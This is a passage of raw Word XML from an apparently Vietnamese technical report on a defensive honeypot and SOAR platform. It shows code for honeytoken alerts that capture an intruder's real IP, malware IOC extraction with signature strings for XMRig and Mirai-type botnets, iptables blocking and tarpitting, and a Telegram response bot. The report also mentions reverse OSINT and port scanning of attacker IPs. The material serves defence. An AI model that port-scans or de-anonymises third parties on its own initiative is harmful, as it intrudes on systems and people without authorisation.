            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    token_info["user_agent"] = request_headers.get("User-Agent", "Unknown")</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return {</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "alert": "HONEYTOKEN_TRIGGERED",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "severity": "CRITICAL",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "message": f"Kẻ tấn công đã mang tài liệu bẫy ({token_info.get('type')}) về máy thật để mở!",</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "attacker_real_ip": real_ip,</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "attacker_fingerprint": request_headers.get("User-Agent"),</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        "token_details": token_info,</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6768019F"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cơ chế khử ẩn danh kẻ tấn công trong core/honeytoken_manager.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1311B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4.6 Chi tiết Mã nguồn Phân tích Mã độc &amp; Tra cứu VirusTotal (payload_analyzer.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B9B5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Phân hệ 'PayloadAnalyzer' sử dụng thư viện hashlib để tính toán mã băm SHA256 và MD5, đồng thời sử dụng biểu thức chính quy (Regex) quét qua chuỗi nhị phân để trích xuất địa chỉ IP C2 và URL máy chủ tải mã độc giai đoạn 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>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711483DE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46A2DD67"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def _extract_static_iocs(self, content: bytes) -&gt; Dict[str, List[str]]:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    text = content.decode("utf-8", errors="ignore")</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    ip_pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    url_pattern = r"https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+[^\s]*"</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 xml:space="preserve">    ips = list(set(re.findall(ip_pattern, text)))</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    urls = list(set(re.findall(url_pattern, text)))</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    signatures = []</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if "xmrig" in text.lower():</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        signatures.append("Cryptocurrency Miner (XMRig / Monero)")</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if "/bin/busybox" in text or "dvrHelper" in text or "mirai" in text.lower():</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        signatures.append("IoT Botnet Variant (Mirai / Gafgyt)")</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return {"ips": ips, "urls": urls, "signatures": signatures}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B13D87B"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Trích xuất IOCs tĩnh và chữ ký mã độc trong core/payload_analyzer.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0364B1D7"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4.7 Chi tiết Mã nguồn Động cơ SOAR Thực thi Phản ứng (soar_enforcer.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49073F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'SOAREnforcer' quản lý việc chặn IP trên Tường lửa và điều hướng kết nối vào Tarpit. Module hỗ trợ kiểm tra danh sách trắng (Whitelist) để chống tự khóa nhầm máy quản trị viên và tự động xuất bản Threat Feed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af0"/>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0D92467A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36239184"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def block_ip(self, ip: str, duration_sec: int = 3600, reason: str = "Brute Force") -&gt; Dict:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if ip in self.whitelist:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        return {"status": "skipped", "message": "IP nằm trong Whitelist an toàn"}</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"], check=True)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    self.blocked_ips[ip] = time.time() + duration_sec</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    self._append_to_ioc_feed(ip, reason)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "FIREWALL_BLOCK", "ip": ip}</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>def tarpit_ip(self, ip: str) -&gt; Dict:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    if "linux" in self.os_type:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        cmd = f"iptables -t nat -A PREROUTING -p tcp -s {ip} --dport 2222 -j REDIRECT --to-ports 22222"</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(cmd.split(), capture_output=True)</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return {"status": "success", "action": "TARPIT_RESOURCE_EXHAUSTION", "ip": ip}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FA681C6"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cơ chế chặn Firewall và Tarpit trong core/soar_enforcer.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD5F65"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4.8 Chi tiết Mã nguồn Telegram SOAR Bot tương tác 2 chiều (telegram_soar_bot.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED1970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Khác với các script thông báo một chiều, Telegram SOAR Bot được cài đặt luồng chạy nền (Background Polling Thread) để đón nhận các sự kiện bấm nút 'callback_query' từ phía Chuyên viên SOC và phản hồi kết quả tức thì:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>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1451D846" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="799CED8B"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reply_markup = {</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    "inline_keyboard": [</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 xml:space="preserve">            {"text": "Trinh sát ngược OSINT", "callback_data": f"recon:{ip}"},</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "Đưa vào Tarpit", "callback_data": f"tarpit:{ip}"},</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 xml:space="preserve">            {"text": "Chặn Firewall tức thì", "callback_data": f"block:{ip}"},</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            {"text": "Mở khóa IP", "callback_data": f"unblock:{ip}"},</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 xml:space="preserve">    ]</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>payload = {"chat_id": self.chat_id, "text": text, "parse_mode": "HTML", "reply_markup": json.dumps(reply_markup)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22E2A2C3"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Xây dựng giao diện nút bấm tương tác Inline Keyboard trong core/telegram_soar_bot.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AE88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4.9 Tích hợp Hệ thống qua Phân hệ Điều phối Trung tâm (main.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0887F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Tệp tin 'main.py' đóng vai trò là Orchestrator trung tâm, nạp tệp tin cấu hình YAML, liên kết toàn bộ 7 phân hệ với nhau và điều phối dữ liệu từ sự kiện log tới hành động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156179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Bảng 4.1 tổng kết trách nhiệm và sự liên kết giữa các module trong hệ sinh thái:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED36FB7"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4.1: Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>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56ADCFB4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1071AF5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Module Tệp tin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7460CA8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Trách nhiệm Kỹ thuật Cốt lõi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4045F3F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Thư viện / Giao thức Chính Sử dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="3BA766AE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65061F5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core/cowrie_listener.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36ECCBC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 xml:space="preserve">Theo dõi và phân tích luồng JSON thời gian thực từ </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cowrie.json</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3552919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json, os, time, threading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="495E2E7C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="201AF67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core/correlation_engine.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="456E9B4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Thuật toán cửa sổ trượt, tương quan sự kiện và ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F4807C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dataclasses, collections, datetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0863942B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D2A2DC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core/reverse_intel.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="162BFAC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Trinh sát ngược OSINT, tra cứu GeoIP, AbuseIPDB, Shodan và quét cổng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="303F53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socket, requests, ip-api, AbuseIPDB API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="109382C0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F37DDE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core/honeytoken_manager.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D49E90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Sinh file bẫy mồi (AWS, Bash, SQL) và xử lý khử ẩn danh Hacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277D64D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uuid, os, hashlib, HTTP Webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="603BA0D2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="060BBB0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core/payload_analyzer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B127C4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tích tĩnh mã độc, trích xuất IOCs IP/URL và tra cứu VirusTotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F371C0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hashlib, re, VirusTotal v3 API</w:t>
            </w:r>
          </w:p>
